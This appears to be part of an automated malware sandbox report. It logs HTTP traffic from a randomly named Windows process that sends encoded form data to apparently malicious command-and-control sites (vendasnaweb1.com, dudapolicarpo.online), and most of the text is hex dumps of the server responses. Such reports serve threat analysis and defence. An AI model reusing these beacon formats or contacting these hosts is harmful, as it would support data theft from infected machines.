                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 [TRUNCATED]
                                                          Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3I (tIX(DWP0goz|9u?Br|pQrN<)(b3HeuUIF15NL9UX]*w$c[Ga-q.aKOnLQFhL216+P\Zgx[2&Z,ZKf-m_j/nvQK;luZ_/Zw[b@oK@<M`QCE,BE2[2;`73h[kS",Y4A|>{=UwYMXL!i0ZITyg6't"K`FAFkd?LkjYp?u7'&k4Q(:G\4.wN-]wrB~Kc9E"wvtcbiONbpQM05G
                                                          Jul 3, 2024 15:59:28.960521936 CEST224INData Raw: 18 8f c7 e6 67 f7 eb 7d 63 23 70 be 12 d8 ce 84 97 1f b3 23 74 54 6d 22 59 5c 0b 96 85 1e a6 f6 4b ce af fa 11 7e 4f 26 fd 5f f2 09 74 26 bf e4 bd 4e 87 e3 f7 05 bb 2c 23 b5 a3 69 e1 4e 5a e3 77 af bb c1 eb 5d 58 3e 61 5b e7 7e 6d ff a9 04 d9 4a
                                                          Data Ascii: g}c#p#tTm"Y\K~O&_t&N,#iNZw]X>a[~mJh|}f..p{" `XX`kRzknXxO%BwjSfra"g'C&E:> 'D(*S~db#.Zw
                                                          Jul 3, 2024 15:59:28.960534096 CEST1236INData Raw: 3a cd ee b0 d3 08 44 0b c3 cc c1 b7 12 52 50 ae 5e 2b 9d 5c 6b 34 d9 d8 78 e3 7f ad 95 83 3b 7c e8 f1 5a 73 31 13 52 fe 08 8c 7f 67 e0 6f 39 e6 cb 79 f0 ba 73 df 68 ea 71 9d b5 7c de 57 28 92 44 d2 e3 9a d3 59 ad c9 5a 13 ac 1f d7 2e 3a 1d d2 ef
                                                          Data Ascii: :DRP^+\k4x;|Zs1Rgo9yshq|W(DYZ.:ewK#Dhc-CCc_{RdZDc"4E+A-eU2TXY;pNLgkM;6,=Zv<^%X57o"wXkgqGb
                                                          Jul 3, 2024 15:59:28.960545063 CEST1236INData Raw: 96 6e 46 6d 26 bd 83 48 ff 20 32 38 88 0c 0f 22 17 7b 91 45 c6 b8 27 10 74 5b bd 21 a4 a4 d7 ea 5f e2 ef fd 92 82 83 bb a5 ed a8 84 89 fb b9 98 e0 f3 f1 0c 05 f7 ac 53 cd e1 d7 60 86 0b 80 fa ea 0d e7 77 22 62 92 4a f3 6b a3 79 88 63 44 9c 3c 0d
                                                          Data Ascii: nFm&H 28"{E't[!_S`w"bJkycD<H{!B8%!B8%4x!B8%4|!B8%tBpGhacUC|v?-aiLu`BhdQr\@Ged&KmXR@P\LS:(XpFZj3$N_$"wn
                                                          Jul 3, 2024 15:59:28.960583925 CEST1236INData Raw: 26 16 ca 1f 2a bd 93 31 ce 85 8a 8b ae 95 0f 45 c3 9d 97 03 90 fb 60 96 80 81 fa 51 69 4a 89 1f d5 be b1 94 20 e8 66 77 c4 6a 29 38 79 f3 76 e0 ff e1 f4 77 d4 8a 8f 48 28 58 0a 81 91 15 c7 60 90 dd bd 18 87 47 d6 13 28 ad 60 bd 0c c6 45 ee 05 5f
                                                          Data Ascii: &*1E`QiJ fwj)8yvwH(X`G(`E_`.tPP0z5[+v?UybiO;A3h3.ANf.(%]D@j^tY{~sH#UA*K\)$0+vKgq,dj
                                                          Jul 3, 2024 15:59:28.960597992 CEST1236INData Raw: 75 32 40 bf eb ff 3d c4 a2 ac 3c a9 df 4e 6a 05 b2 98 0a 8e 99 00 8a 46 73 86 0e d3 cb 58 71 0b 65 0e 1e 87 8b 42 fb 35 d5 2d d6 81 14 0a 98 59 67 d5 d1 83 1c e2 26 ba 97 77 ae 06 f8 7b f1 b6 0f fd c6 76 d7 2c 37 99 44 1f 9b dc 26 cf 85 ef 0f a0
                                                          Data Ascii: u2@=<NjFsXqeB5-Yg&w{v,7D&?u'!v~|.N}rsLUgCZen%3SLgs~mw^6nx*ZYuW(Kr0APq.1{X.e&Pk]<M
                                                          Jul 3, 2024 15:59:28.960720062 CEST1236INData Raw: 4c f3 2d f9 d5 45 b7 7f 64 19 cb b4 01 a6 85 dd 68 c8 1e 64 46 87 3e 6d 18 f2 70 1f 2d 36 8c 0b 9f b1 bf 5d ea f4 de 0a a5 50 c0 cc ba a2 de ed 0f 39 c4 4d 13 87 ac 7e d1 ec 0e 2e 9b bd de 65 b3 db 20 9d df fa 60 bd 3b 1c 36 af ba 18 1c 34 48 b7
                                                          Data Ascii: L-EdhdF>mp-6]P9M~.e `;64Hmh}ozoxz>fni:Wnh<Jv!`/S#2=0lv62,ORa?R^95W&E%WoQAvXHk{I r&Olx9^-u_
                                                          Jul 3, 2024 15:59:28.960731983 CEST552INData Raw: 3a 7b 1c 4f d1 65 c9 a0 6c 77 98 db 28 1f 84 a5 92 cd 75 ee e8 44 c2 dd 41 30 36 82 17 e4 96 68 3f 47 92 59 fb f9 b8 b6 e6 5f fb b5 ac 59 f7 2d 31 d6 89 ef df d7 7e 6d 34 b3 66 d2 6d 26 bd 66 d2 6f 26 83 66 32 6c 26 17 cd 5c 36 b5 ac 70 c1 7f 1d
                                                          Data Ascii: :{Oelw(uDA06h?GY_Y-1~m4fm&fo&f2l&\6p6$?X)vg Dj6X@q(>F=0;9/KJcv@RxDhG<^amPkVs|tl3aJ6Y<0
                                                          Jul 3, 2024 15:59:28.960743904 CEST1236INData Raw: 3a 1f cd f7 8f 94 a6 c0 45 9e ae f2 fd ae 02 a2 b4 49 99 2c 43 33 28 5d 31 e8 74 46 12 57 4e 93 65 a0 db 1a 0e 47 3b 2b 36 5a 23 76 c6 38 17 2a a6 4e e3 76 3a d9 dd 43 39 4b c7 1d 12 b4 19 8b 7c 02 1d 76 1a 0f 01 84 da 39 9d 3e da a7 b4 fd 23 6d
                                                          Data Ascii: :EI,C3(]1tFWNeG;+6Z#v8*Nv:C9K|v9>#mY0K@=P[R4ssp(HF+xO$zfq/OM=L0`Q3<0!NY'%H4#iRw3BI@|OOnyQsq
                                                          Jul 3, 2024 15:59:28.960757017 CEST1236INData Raw: 78 e5 a9 50 3a 5f c9 c5 d2 10 55 c7 d2 bd b8 36 4c c5 9f a6 d9 93 3a 3d ce 74 c9 68 3d a5 01 fe 92 f4 2a e0 ab 3c 06 66 be 56 9e cd 7d fa ca 14 c2 26 65 ec 93 7c f6 38 7e 05 ab 48 6b e9 53 67 cc a4 d4 66 10 39 93 a7 9f c4 a3 12 b1 a2 33 f2 42 5a
                                                          Data Ascii: xP:_U6L:=th=*<fV}&e|8~HkSgf93BZ%,74jw/oyno_nSP;.Sl`*zBUJW+?z^Gez1|z\Lz\Lz\Lz}oLn.}K*
                                                          Jul 3, 2024 15:59:28.965537071 CEST1236INData Raw: 67 51 d9 a2 10 fe a4 26 83 53 72 0e 9a f8 21 81 86 e0 66 00 ea a4 3e 17 a7 e4 78 17 55 3a e8 b9 fe 39 a9 eb 4b b2 27 5f 54 4f f0 80 4f fa e8 93 67 8e 77 79 4a ce a2 70 04 17 06 22 6f e1 20 d2 32 4f d5 88 49 11 a3 9f 1d a4 f6 31 cf 28 36 15 31 f3
                                                          Data Ascii: gQ&Sr!f>xU:9K'_TOOgwyJp"o 2OI1(61[1|2N0{{JK7?9KsR?[NN(;)I&->Ic|6iY3Q !EBWWUvE.xuU{IX0K@


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.449780162.241.2.92801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:30.591555119 CEST10840OUTPOST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 39 42 39 42 70 55 72 70 63 6f 69 36 6e 74 32 64 38 31 6c 54 39 50 52 48 72 34 62 4a 4f 54 57 33 6d 61 42 39 47 4e 72 6c 34 32 48 58 35 49 4d 44 30 50 7a 6b 79 5a 43 55 36 6a 4d 53 32 66 48 6e 67 35 30 2b 36 52 73 76 55 71 43 62 32 71 2b 42 6c 57 79 38 4a 44 48 6a 36 33 6c 59 31 6f 77 49 78 59 59 2f 72 34 62 76 4a 53 63 78 36 52 4e 52 7a 48 6b 35 76 31 64 4d 31 35 73 64 36 4a 43 41 74 58 6a 69 58 71 44 46 4b 4f 34 63 35 52 69 39 6e 50 31 76 45 2f 56 41 51 6b 74 4c 47 37 31 51 67 58 36 34 46 7a 44 71 45 6b 4a 35 53 2f 62 41 72 55 4b 64 72 5a 37 38 32 2b 57 54 77 76 65 63 64 34 51 47 52 58 43 74 43 75 53 62 62 52 33 49 32 6b 6a 48 2f 69 46 38 76 51 6a 71 65 49 6f 74 39 72 55 72 78 59 68 4c 49 4d 62 76 57 6a 78 2b 39 39 59 37 32 62 30 30 51 66 61 46 31 54 37 76 55 4b 2f 31 6d 47 34 69 66 33 58 76 6f 39 53 48 66 62 70 6c 5a 6e 4b 31 68 61 66 75 59 59 4f 65 6b 6a 42 52 43 55 78 35 61 56 47 30 35 50 5a 48 65 38 76 6c 78 56 37 38 46 50 34 6a 39 69 52 51 36 47 79 6e 56 53 78 46 73 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=9B9BpUrpcoi6nt2d81lT9PRHr4bJOTW3maB9GNrl42HX5IMD0PzkyZCU6jMS2fHng50+6RsvUqCb2q+BlWy8JDHj63lY1owIxYY/r4bvJScx6RNRzHk5v1dM15sd6JCAtXjiXqDFKO4c5Ri9nP1vE/VAQktLG71QgX64FzDqEkJ5S/bArUKdrZ782+WTwvecd4QGRXCtCuSbbR3I2kjH/iF8vQjqeIot9rUrxYhLIMbvWjx+99Y72b00QfaF1T7vUK/1mG4if3Xvo9SHfbplZnK1hafuYYOekjBRCUx5aVG05PZHe8vlxV78FP4j9iRQ6GynVSxFsOBnaWx2Ai4Hfg00gmndRg+RWLSEM4DlGyE0/ErptvHdaZwM9VDTfkdcVBms93aG3J0nKuD+IPjgHu4623/rFEBt51/HvPrJcft79GDRpHoYSSPwtmoWEmR340G4XqG9AZlfm4O+gB2G+C79GFsmCfc5cNYiuOGSon4bdFGpZe1LGzsp6XtpHWKR/sNGcz/+3Sk2XxqZ4rDu6dp2gcGSaAyLT+cB+z/mJTwspgHVZT6/q9p/YB383v/VQX/s+ddtCkb9Bmfol2QBgxIoJKzu3ymRBBasAy6hpxhVxDur+EHx59d3hdQiyKwOrYyORmv5n7Arx6mi3Y3PYksI8BdB5BzLTqby6u16HbihsANh46AAtCftmp1G9B1COat0uo+z4mgWlEUKKoichugJZ9xdxuMghmFUwW07iGrYSfHyh34y4/pdM2WMNA9rIG6rnb7fCPXFPBzmwF6hWUlIS7SYHE9dsnuMFyYvD61blbg/uFxT4cEsUBweqoW1735sWaWgshdsdcwO0oxFlg+hk8gRmgurZ8N2LmXoAO8+QN7WDOi4QzLe2/Z83LG6niA9zEzNewKHLfu3fLUxSjtcjNSiYY+DAvGcnzOPtBzzXjFqZygK0Usc29m3nWPz7fmr4Ux9/ln9tWEHg3NIBx6U6SOOjHHGkfopddoJGgY [TRUNCATED]
                                                          Jul 3, 2024 15:59:31.300964117 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:31 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 [TRUNCATED]
                                                          Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3I (tIX(DWP0goz|9u?Br|pQrN<)(b3HeuUIF15NL9UX]*w$c[Ga-q.aKOnLQFhL216+P\Zgx[2&Z,ZKf-m_j/nvQK;luZ_/Zw[b@oK@<M`QCE,BE2[2;`73h[kS",Y4A|>{=UwYMXL!i0ZITyg6't"K`FAFkd?LkjYp?u7'&k4Q(:G\4.wN-]wrB~Kc9E"wvtcbiONbpQM05G
                                                          Jul 3, 2024 15:59:31.300981045 CEST1236INData Raw: 18 8f c7 e6 67 f7 eb 7d 63 23 70 be 12 d8 ce 84 97 1f b3 23 74 54 6d 22 59 5c 0b 96 85 1e a6 f6 4b ce af fa 11 7e 4f 26 fd 5f f2 09 74 26 bf e4 bd 4e 87 e3 f7 05 bb 2c 23 b5 a3 69 e1 4e 5a e3 77 af bb c1 eb 5d 58 3e 61 5b e7 7e 6d ff a9 04 d9 4a
                                                          Data Ascii: g}c#p#tTm"Y\K~O&_t&N,#iNZw]X>a[~mJh|}f..p{" `XX`kRzknXxO%BwjSfra"g'C&E:> 'D(*S~db#.Zw:DRP^+
                                                          Jul 3, 2024 15:59:31.300992966 CEST448INData Raw: 4f fa 30 74 8c b4 b2 63 a8 c5 63 b5 7d 1e 81 cd 58 8c f3 0b eb 8e 41 2b 36 15 31 73 42 2b d2 3a ac 5a 14 b2 52 1c 2a b5 c1 94 99 3a dd 2a a0 e8 48 9d 2f a5 6f 0a 25 9c 60 b2 31 0a 59 74 1b 17 22 d3 1d 01 46 2b 13 4f 24 dc 8d fc 17 e5 c2 40 e4 a1
                                                          Data Ascii: O0tcc}XA+61sB+:ZR*:*H/o%`1Yt"F+O$@b36EhlCnC%uGB,"bw-X(*6tyD2`EmoTBnf|$.IyNIqin+anFm&H 28"{
                                                          Jul 3, 2024 15:59:31.301048994 CEST1236INData Raw: 4e 5f fb 97 c6 12 24 92 22 a3 19 f3 fd fc 77 fd fc fb 6e b7 f5 b6 df ba b8 1a 4c af 5a 9d fe 5b 39 6c 5d f4 fb b4 f8 46 4a bd ee 85 ff 2e 02 17 c4 7f 25 98 36 98 76 5b 97 fd cb 7f e9 f6 5b 3d 2c b8 ec 74 49 f1 4d 7d ea 2a ff 72 d0 2b bf ff ad d7
                                                          Data Ascii: N_$"wnLZ[9l]FJ.%6v[[=,tIM}*r+MhQ0Xv }\[i]a+ldU5$E|5+6lP.@\d'"&=q=B&}5M$W.j%M2KDaSn@>oL~9J+
                                                          Jul 3, 2024 15:59:31.301064968 CEST1236INData Raw: a7 c2 71 b0 91 11 99 8f 2c b8 b0 99 64 f3 d2 0d ad 82 6a 2e a8 d3 5a da a5 75 f1 92 05 5d dc 9a d5 52 70 f2 66 d2 f1 ff d6 de 2d 76 b9 aa 2b 1b a2 68 60 70 8d ab 9d 17 08 0f e4 e1 12 58 74 bb dc 29 95 30 71 3e 7b e4 e0 ce 51 67 98 b2 13 6d d2 20
                                                          Data Ascii: q,dj.Zu]Rpf-v+h`pXt)0q>{Qgm EN3.+s(L0e+N#-N09rcy.^`">"AwAS|^%,-M1?zQ 4U. _zQ^u`NH98%,8D|[,
                                                          Jul 3, 2024 15:59:31.301075935 CEST1236INData Raw: 82 2e a4 65 12 26 c4 50 9d d3 6b 5d f4 86 ab 3c a5 4d ca 64 65 de 94 99 3a a5 b3 8c d2 cc 80 05 47 37 59 74 59 b7 64 94 e4 31 3c 1d c2 57 2d 01 1c dc 39 ca a4 88 15 8d 70 7e 30 8b 4d 24 28 23 07 89 12 26 6e 3b cd df 0f 92 8c 57 7f 3b ab 08 dc bf
                                                          Data Ascii: .e&Pk]<Mde:G7YtYd1<W-9p~0M$(#&n;W;QGBpPZ-d@in* .orD/9pL,&u%~jr8aX47Pu;-EIGx6x:H,0M5#:V8Sh\k;m*1hQ
                                                          Jul 3, 2024 15:59:31.301230907 CEST1236INData Raw: 72 26 4f 1f 6c 78 39 c0 5e 03 bf f8 2d cf 75 9b dd 9e 5f fd db 06 e9 6d 2b e0 17 83 12 0c 56 31 24 3a 18 94 f6 b8 58 c5 7c 31 aa f7 16 f9 5f ad 63 d8 60 70 d5 bc 7c 54 3e 94 09 55 2a f5 cb 72 93 c9 07 bd 52 ac aa d7 b9 c0 09 2e b6 d8 23 cb 21 b2
                                                          Data Ascii: r&Olx9^-u_m+V1$:X|1_c`p|T>U*rR.#!<j[=G)06JEd0b6#}B6/+M@uL=wPQ.VcK4F EC>+]mwGmDU{o^>{ij
                                                          Jul 3, 2024 15:59:31.301243067 CEST1236INData Raw: aa 61 91 de 12 96 4a 36 d7 b9 a3 b8 a7 59 83 3c 30 c3 a2 7a 82 c7 f1 2a c7 58 54 0d f1 28 d6 e7 95 24 96 a3 3d 05 11 bd 64 9d 61 42 01 7f c9 a1 0f 60 3f 7d f6 7d c8 17 93 60 22 e1 ae 41 16 db e6 38 96 1a 1b c1 f7 53 ab 76 84 f4 5a 4c 8a 58 49 98
                                                          Data Ascii: aJ6Y<0z*XT($=daB`?}}`"A8SvZLXIFR1$q7\=nDK5|o#v#(fg;M^41W4?|=DU=^^.-]([w;0l4LS:(=@i,u$N@D'.9U\#9
                                                          Jul 3, 2024 15:59:31.301254034 CEST552INData Raw: c2 ff 34 fe 1b 98 87 7a f4 5f a6 47 bf a2 07 8b 22 50 9f a6 52 09 71 1c fb d3 14 5a 81 1c c7 ff 34 75 56 20 c7 f1 07 2f 81 3f 38 8e 3f 7c 09 fc 61 05 7e 28 11 86 86 da 70 30 2b e0 ad cb 03 a0 45 65 95 23 e7 4c e1 63 2e 6c 42 63 c3 e6 cf 02 df 07
                                                          Data Ascii: 4z_G"PRqZ4uV /?8?|a~(p0+Ee#Lc.lBc3Kg@3y*SYdB|BRxG~"N@-m^{ Gw}Alj,dh,7%@~p}1i3fPW>!a+Yzeq
                                                          Jul 3, 2024 15:59:31.301451921 CEST1236INData Raw: 93 6e e7 c1 2e dd 17 ea d2 7d b0 4b ef 85 ba f4 2a ba d8 94 49 49 27 1a df ad f8 08 8b f5 a9 0a 74 fd 48 cb ba 0a bc 14 b8 c8 d3 67 00 96 85 15 88 92 99 18 9e 01 58 d4 55 e0 dd 3d 1b f1 ee 38 e6 27 80 1e 47 0d 35 9f 97 a9 13 96 0a 39 5f 6c 9d 8f
                                                          Data Ascii: n.}K*II'tHgXU=8'G59_l(Lg.4Rj31yvHg-,nbS3'*g d#,%`(>$aV"Ry9!$zfq+F=dD/YyP)T2KV|+
                                                          Jul 3, 2024 15:59:31.306648016 CEST1236INData Raw: c7 2e 78 1f ff 75 d9 55 ff a2 7b 49 58 30 4b c0 40 1d cb 5d 7d ab 94 86 b9 73 5a 35 1a 0b ec aa 4d c5 e2 8b 38 2d 38 1a 66 5d 63 74 7f 76 dd b6 6e 2e e1 e6 ec ba f8 25 82 8f cf b1 24 94 3a ba a5 a8 43 26 99 03 6a 6f 45 46 a5 50 b7 54 28 fc c1 b9
                                                          Data Ascii: .xuU{IX0K@]}sZ5M8-8f]ctvn.%$:C&joEFPT(=9;{~j8;G*-"z5w1D(d]v~[$ S{L,T@*`&Rq>1a8 EirELp|:C&er/QrE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.449781162.241.2.92801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:33.129729033 CEST465OUTGET /j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:33.824275970 CEST581INHTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 03 Jul 2024 13:59:33 GMT
                                                          Server: nginx/1.23.4
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          X-Server-Cache: true
                                                          X-Proxy-Cache: MISS


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.449782162.240.81.18801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:44.358217001 CEST750OUTPOST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 70 50 6c 48 48 68 35 6b 75 37 55 35 68 35 56 73 46 30 6c 37 74 61 47 6b 72 73 4a 67 30 2b 42 44 6a 54 30 76 37 49 73 34 77 38 47 65 57 61 58 42 66 66 63 2f 64 36 6a 74 4d 78 38 4c 44 4f 48 71 6e 6d 70 51 44 75 4e 4f 56 66 5a 53 36 78 70 47 33 6d 48 64 44 63 4e 6e 58 72 38 67 37 30 6d 32 30 33 30 66 4c 4c 71 53 63 68 51 6d 72 6c 4b 67 69 39 72 69 66 41 41 5a 35 49 48 36 4e 72 62 77 71 7a 51 30 63 44 5a 33 2f 7a 62 53 67 59 32 62 53 56 35 42 69 70 44 79 61 79 62 6d 61 79 55 30 73 45 37 2b 59 32 52 45 7a 54 37 51 74 57 6d 48 5a 4e 43 58 4b 4e 5a 44 42 50 52 43 39 62 45 4a 5a 67 3d 3d
                                                          Data Ascii: TvpPfhGp=pPlHHh5ku7U5h5VsF0l7taGkrsJg0+BDjT0v7Is4w8GeWaXBffc/d6jtMx8LDOHqnmpQDuNOVfZS6xpG3mHdDcNnXr8g70m2030fLLqSchQmrlKgi9rifAAZ5IH6NrbwqzQ0cDZ3/zbSgY2bSV5BipDyaybmayU0sE7+Y2REzT7QtWmHZNCXKNZDBPRC9bEJZg==
                                                          Jul 3, 2024 15:59:44.940063000 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
